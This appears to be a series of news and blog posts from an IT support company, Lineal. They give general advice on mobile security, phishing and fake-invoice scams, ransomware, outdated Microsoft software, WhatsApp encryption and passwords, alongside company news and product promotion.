We increasingly live in a mobile dominated world in which Smartphone sales have skyrocketed whilst traditional PC sales have stalled. With portable devices likely to be the future of many people’s IT use – we’ve put together a few of the main smartphone security threats you need to be aware of.

• Mobile Phishing & Fake Apps

Phishing websites which pretend to be your bank in order to get your personal or financial details have been around for many years, but for few people imagine that this is also a big risk on their smartphone.

Fake apps are the most obvious modern incarnation of this scam. IT security specialist ESET recently showed that a popular app like Prisma spawns multiple fakes online, downloaded unwittingly over 1.5 million times before being pulled from Google Play, with many containing harmful malware which attempt to steal personal information.

Don’t attempt to download an anticipated app before it’s official release date, as it’s likely you’ll be downloading a fake. Avoid downloading apps from unknown third-party websites, check the comments for warnings from other users, and invest in mobile antivirus to intercept downloaded threats to your smartphone security.

• Old-fashioned Theft

In addition to fitting in your pocket, your phone contains a staggering amount of personal information about you which makes theft a real danger – everything including your personal details and those of friends/family, your emails, GPS coordinates of places you regularly visit and more: all stored on the device.

Home Office research suggests iPhones are the device most likely to be stolen – perhaps reflecting the Apple smartphone’s high value, quality and distinctive branding.

In addition to setting numeric pin codes on every device to prevent the danger of theft, tracking and lifesaving wiping tools like are strongly advised.

• Public Wi-Fi Networks

With the proliferation of portable devices, many businesses, particularly in retail, offer public Wi-Fi hotspots to customers.

The problem with this is that you’re sharing a network with… whom? Terrifying free tools like [Redacted – obviously] and [Redacted] allow anyone on a shared public network to view insecure websites you visit, and snoop on any keystroke you type.

Not every public Wi-Fi network is a security nightmare, but it’s sensible to avoid using public Wi-Fi to do anything sensitive, such as online banking. A 4G data connection or simple telephone banking is the easiest alternative if you’re on a mobile phone, and likely to be more secure than a public Wi-Fi Network.

It should probably go without saying that you shouldn’t connect to entirely unrecognised, unsecured or unknown Wi-Fi networks either. For obvious reasons.

• Being Personally Targeted

The problem with the wider shift to portable devices is that we carry our workplace into the outside world. Many of us expect complete access to our business data on our smartphone (as we would on our PC) wherever we are.

But carrying your work phone outside work means you’re also outside the protection of in-house IT security software and firewalls.

A simple phishing email can easily be targeted to you outside working hours when you’re ‘off-guard’, and the potential loss of confidential company data could be devastating.

Of course, many of the best IT security software providers now offer Android & iOS smartphone versions of their antivirus software – so why not extend your business’ IT security to your smartphone?

For IT support and security guidance – contact Lineal today.

North Devon Show

Team Lineal recently attended the 50th annual North Devon Show, setting up alongside a range of local businesses in the show’s ‘Arcade’ tent at the Umberleigh show ground.

Visitors to our stall at the largest one day event in North Devon received free 30-day trials of Microsoft Office 365 (along with many free sweets!) to celebrate Lineal recently becoming a Microsoft Gold Partner. We also took the opportunity to showcase our SQLWorks business software, ShoreTel Unified Communications systems, ESET security software, and much much more.

“As a local business, Lineal are always pleased to be able to attend the North Devon Show” explained Lineal’s managing director Mike Matthews: “the huge variety of enthusiastic local firms and organisations exhibiting here always make the day a success, and there’s always something new to see.”

Two days of rain beforehand didn’t dampen spirits, and the show itself was sunny and well attended by thousands of both North Devon locals and tourists to the area.

We’ll see you next year!

For IT Support, systems and software expertise – contact Lineal today.

fake invoices

This week’s IT security alert from Lineal – fake invoices which ask users to run a dangerous piece of code.

The example above comes from a fake Word document emailed with a typical text line, such as ‘Please check this invoice’ or ‘Double check my numbers for me’, to an unsuspecting user.

Upon opening, the document appears to load a popup from Office 2016 prompting the user to ‘Enable Content’ for compatibility purposes, before they can view the detail of the ‘invoice.’

In fact, the display is just an image within the word file, and the ‘Enable Content’ content button instead runs a piece of Visual Basic code downloading unknown malware from the internet.

The scam relies on users’ curiosity at the unusual $1999.00 charge, and upon reaching a user still running an outdated version of Microsoft Office.

Several measures can be taken to prevent this kind of attack:

• Don’t click any popup that doesn’t visibly pop ‘open’ in Microsoft and don’t ‘Enable Content’ you can’t see in a document.

• Consider an email filtering service like Barracuda – in the above example, Barracuda had recognised this email as malicious and stripped the code from the document before placing it in the correct email inbox for the intended recipient.

• Invest in a high-quality antivirus and IT security software like ESET – using sophisticated heuristics and live scanning ESET can block this kind of threat, and advanced versions operate a comprehensive watchlist of fake ‘phishing’ scams which might try to imitate legitimate companies online.

• Move to Microsoft Office 365 – Microsoft’s cloud subscription model now ensures that you’ll always have the most up-to-date version of Microsoft Office, and therefore that if a document gives you this kind of message, it may be a scam.

For IT Security advice and guidance – speak to Lineal today.

customer support

It’s that time of year again – when we ask you how we’ve been doing, and what Lineal can do to improve the quality of our technical support.

Firstly, a big thank you to those of you with kind words to say about members of our IT help desk. Our team found your kind comments to be enormously supportive and it’s good to know that so many of our customers value the contribution of their account manager so highly.

83% of you felt we met the technology needs of small to medium size businesses ‘Well’ or ‘Very Well’, and 89% felt we understood your IT queries ‘Very Well’ or ‘Extremely Well.’ Overall, 85% of you rated our customer support ‘Good’ or ‘Great.’

We weren’t perfect however – some of you felt we’d been slower to respond to certain emails and call-backs recently, and we’re putting in place new measures to address this: we’ll be adding to our team in coming weeks to help manage our responsibilities to our ever-growing number of IT support clients, and to ensure clearer communication between our team and customers during ongoing project work.

Your comments included an insightful mix of both praise and constructive criticism which we’re reviewing carefully – but here were a few of our favourites:

• “A good “local” company. Always on hand.”

• “As a small organisation of mainly non IT literate users Lineal staff always respond to queries in language we understand and without making us feel stupid!”

• “Would like to thank Martyn especially, and dealing with mostly one person simplifies things.”

Thank you to everyone who gave us their feedback, it will inform our future decision making and help us provide a high quality of customer support.

Windows Server 2003

Nearly 1 in 5 Windows Server users are still running Windows Server 2003 at great risk, more than a year after Microsoft announced end of security support for the product, new findings have shown.

Research by Spiceworks and Cloudphysics both found that 18% of Windows Server licensing market share is still taken up by Windows Server 2003, based on data recorded in June 2016. More than 53% of those surveyed also still ran one or more instances of Windows Server 2003 somewhere in their organisation.

Anyone still using the old software risks becoming vulnerable to security threats, which Microsoft will no longer address, with many organisations potentially being in violation of their compliance, insurance or regulatory obligations for data protection.

The continuation of Windows Server 2003 (which Tech Radar last year touted as potentially “the biggest security threat of 2015”) has been left unresolved within many companies, many of whom believe they lack a clear decision, expertise, or funds to replace the now unsupported operating system.

In the short term the best measure is risk mitigation: isolate any Windows Server 2003 systems as much as possible to prevent access by outside security threats.

But sooner or later, all companies will need to upgrade important systems, and those that do make the move are less likely to invest in the capital expense of physical hardware as they were over a decade ago – with increasing numbers likely to utilise an outside IT provider to migrate to a managed virtualised solution, for example business cloud services.

For Windows licensing support or guidance, please contact Lineal today – 01271 375999 or click here.

Zepto

Yesterday Lineal’s team successfully rescued a client from a new ‘zero-day’ Cryptolocker Virus which nearly destroyed many of their files.

The dangerous variation of the ‘Zepto’ cryptolocker, only identified online during the last 24 hours, is believed to be a brand new threat originally derived from ‘Locky’ ransomware.

An employee at one of Lineal’s IT support clients recently opened an email containing an infected file – a malicious piece of obfuscated code written in Visual Basic scripting language. The installed Zepto cryptolocker began encrypting the company’s files, readying to demand a heavy ransom.

In a coordinated attack, an outside user also forced access to our client’s server, instructing it to begin sending fake Barclays ‘phishing’ emails, attempting to criminally capture banking details.

Our team caught both threats early, forcefully locking out the intruder in mid-session, identifying the employee who introduced the threat, and quarantining the infection with ESET’s business endpoint security. 

Lineal then notified ESET about Zepto to help with future identification, having avoided the need to restore all the clients files from backup at great disruption.

The landscape of online security threats is rapidly changing, and Cryptolocker variants have spread quickly in recent months.

In this case Lineal’s rapidly responding team and professional security software helped our client dodge the huge potential losses from the security breach – and highlighted how vital it is that organisations of all sizes take proactive steps to protect their IT from hostile intrusion.

For IT security advice and support, contact Lineal today.

Internet Explorer

New research by security company Duo has suggested that as many as 25% of Windows PC users are running out of date versions of Microsoft Internet Explorer.

Among Windows XP legacy users the problem is particularly acute, with more than half still running Internet Explorer 7 or 8, rather than upgrading to version 11.

Duo suggest this is putting thousands of PC users at risk of exposure to over 700 security risks caused by known viruses, malware or other online threats via their now outdated and unsupported web browser. In particular, un-patched exploits via popular third-party plugins such as video player codecs pose a likely danger.

Microsoft are currently offering Internet Explorer’s latest replacement, the superior Microsoft Edge, free to every user with a Windows 7 license who chooses to upgrade to their PC to Windows 10 before the 30th of July deadline.

Alternatively, users should consider the pushier update-reminding Mozilla Firefox, or Google’s automatically updating Google Chrome offering, along side a tried and trusted security software (such as the excellent ESET NOD32 Antivirus,) to ensure that the technology they use for private data transfers such as email and online banking, remain private.

Contact Lineal today for IT advice and support: 01271 375999 or email [email protected]

Hundreds of people have received new types of phishing emails which knows the individual’s home address.

Clicking the link in the dangerous email, which as a appears very authentic request to pay an overdue invoice, installs devastating cryptolocker ‘ransomware’ on the user’s computer.

The virus then begins encrypting files, demanding a ransom be paid to unlock the user’s data.

According to the BBC the unconnected company cited in the email, cotton fabric manufacturer British Millerain Co Ltd, have received more than 150 phone calls from individuals concerned that they owe money.

Phishing emails and websites, which typically mimic official bank or company communications to trick vulnerable users into making payments to criminals, are becoming increasingly sophisticated.

The use of an individual’s personal address, and higher quality written English, suggests the original creator of the email has gone to greater lengths to make the email look convincing and to avoid detection.

It is also likely that the matching address originates from stolen, legitimate customer data, accounting for users’ recognition of the way they write their own home contact details.

New threats are constantly developing, and Lineal recommend installing an antivirus software with a strong record of catching emerging online threats – such as ESET.

Always follow some simple rules:

• Never click a link or open an attachment from any suspicious email whose origins you do not recognise.

• Banks and similar will NEVER request your private passwords, pin numbers or other confidential information. Do not disclose these to anyone.

• If hit by cryptolocker style ransomware, every second counts – seek professional technical support immediately.

• Always keep a regular, separate backup of your files.

• Invest in reliable Antivirus software like ESET to protect your device(s).

Photo Credit: BBC News

Popular messaging app WhatsApp have launched end-to-end WhatsApp encryption for over one billion users.

The new security capabilities introduced by the Facebook owned company ensures that every message remains encrypted during transmission, preventing even WhatsApp from reading user data.

With encryption and technological privacy issues regularly appearing in recent news headlines, the WhatsApp encryption upgrade comes at just the right moment for the security concerned, after more than two years of delays in development across multiple platforms.

Much like during Apple’s recent legal dispute with the FBI, the move would also prevent the release of confidential user data following a court order. According to reports from the New York Times, the technology provider have been reported to already be in a longstanding dispute with the US Department of Justice over user data.

WhatsApp are making it clear they support absolute user privacy, with “not even WhatsApp” able to read the encrypted data, and users able to verify their connections are secure via a 60 digit or QR code swap.

From today, the WhatsApp conversation screen will now display an official notification to all users – confirming that their messages are encrypted successfully.

For hardware and software security advice – contact Lineal today.

Cryptolocker Warning: in the past fortnight we’ve seen an increasing number of companies hit by sophisticated cryptolocker viruses.

These dangerous programs, often installed by accident, lock your files over time, encrypting data and eventually demanding victims pay a ransom to retrieve their irreplaceable data.

In all of these cases, security products were installed but they did not protect against the threat. In our experience the only product that is reliably detecting these new threats and offering sufficient protection at this time is ESET. Older, less effective or out of date security products are offering little or no protection against these new cryptolocker variants.

Once affected by a cryptolocker, there is no way to de-encrypt scrambled files without paying the ransom, and users must remove the trojan before recovering recent versions of a file from their backups – highlighting the importance of a regular backup plan for data.

Please don’t be the next one to get caught out – talk to Lineal today about IT security options to ensure your valuable data is protected.

Windows 10.1 updates security

With ‘Windows 10.1’ now barely a month old, and the Microsoft operating system already running on over 12 million business PCs, how fares Microsoft’s free updates strategy?

Windows 10.1 update was released with relatively little fanfare (be honest, you didn’t notice) adds features that, understandably with hindsight, might have been a distraction at the main Windows 10 release back in July.

Packaged within were mainly performance and security upgrades – Windows 10.1 will now boot almost 30% faster than an old Windows 7 system on the same device, the Cortana virtual assistant has some new handwriting recognition skills and there are new enterprise tools for mobile devices. Microsoft Edge runs smoother too, offering previews of tabs before viewing and syncing favourites across devices.

Most importantly, after recent corporate data breaches in the news, Microsoft have added a range of new security safeguards. These including ‘Windows Hello’, supporting enterprise grade biometrics including fingerprint and facial recognition – sadly currently only available for US users.

Aside from controversy surrounding user privacy then (if you didn’t notice your Windows 10.1 update, that’s maybe because Microsoft installed it automatically on your device without asking you) the first free update went ahead with relevant additions and limited fuss.

Starting free updates officially moves Microsoft into line with Apple’s OS X business model that has become the industry standard. Yet limited promotion of Windows 10’s ongoing development risks downplaying Microsoft’s progress.

Which would be unfair, because Microsoft is plainly taking extra care to develop the business security of their product range, including the excellent Office365, Microsoft Azure and now Windows 10.1. Microsoft is clearly listening to business’ fears, and businesses should welcome it.

For help and support with Microsoft enterprise IT, contact Lineal today.

How to keep your IT Secure

Data breaches can lead to a massive loss of trust among customers, so how do you ensure your IT remains secure?

Despite what many online sign-up forms would suggest, the ‘strongest’ password is not necessarily long and complicated. Whilst complexity makes a password harder to guess or crack with a ‘brute force’ testing of combinations, most security breaches occur from stolen passwords, either physically or by malware attacks.

Very complex passwords do not help in this respect: users still need other IT security, such as antivirus software, errors are more common when typing (particularly on handheld devices) and employees may find complex passwords harder to remember – undermining data security by writing down their login details. The ubiquitous sticky note attached to the monitor is still a trusted solution to working with complex password policies in some organisations!

Routine password changes are a sensible precaution for most businesses, but can make it harder for employees to remember their passwords, leading to the same problem in which users are locked out of work accounts, copy passwords across accounts, or write passwords down at risk of theft.

Phrases can help avoid this problem by making passwords easier to recall: ‘Lineal15theB3st’ is preferable to a 15-digit numeral because a touch of personality adds memorability. Beware profanity though – just imagine trying to explain it to technical support later on!

Here at Lineal we’d also advise against ‘Remember Me’ automated sign-in functions, as well as Windows 10’s new Wi-Fi password sharing ‘Wi-Fi Sense’ Feature, as these make your chosen password redundant.

If you want to see where the future of online security is going, follow the money: most online banking incorporates a two-stage authentication process, requiring both a password and a unique alert code texted to the customer’s mobile phone for identification. This is already a free optional setting for Google, Facebook, Twitter and other popular websites.

Lineal’s advice is to stick to the following basics:

Avoid physical theft:

• Don’t write your passwords down on a post-it note on your desk! Microsoft has a practical tip: if you absolutely must write a password down, do so in a safe place, without labeling it as a password or to which account it refers. Substitute words should also be used to hide the true password, for example writing ‘Fruit8£’ could refer to a password of ‘Apple8£’.

• Don’t use an easily guessed word, such as your name, your company’s name, 1234, the name of something on your desk, the word ‘password’, or anything similarly obvious.

• Never tell anyone your password, and change your password if you suspect it has been compromised.

Ease of Access:

• If you struggle to remember your passwords, use a password storage program to store some of them. Remember to use a secure password for the program.

• Mitigate against your own forgetfulness by setting up alternate password recovery options, allowing you to choose more varied, difficult passwords.

• Consider where users will need to log in from – take full advantage of using numbers and special characters ( ! , £, %, * etc.) for keyboard users.

Preventing digital theft:

• Use different passwords for your most important accounts, such as online banking.

• Use two-stage authentication.

• Maintain up to date anti-virus security software and firewalls on your work desktops, and don’t download untrusted software or open suspicious emails which could be phishing or contain password stealing malware.

• Consult IT specialists to ensure office networks are protected from outside attacks.

Your security should always be strong enough to give peace of mind. Lineal can provide expert advice and support for securing your IT systems: why not get in contact with us here?

More from Lineal News

Flikr: Jason Baker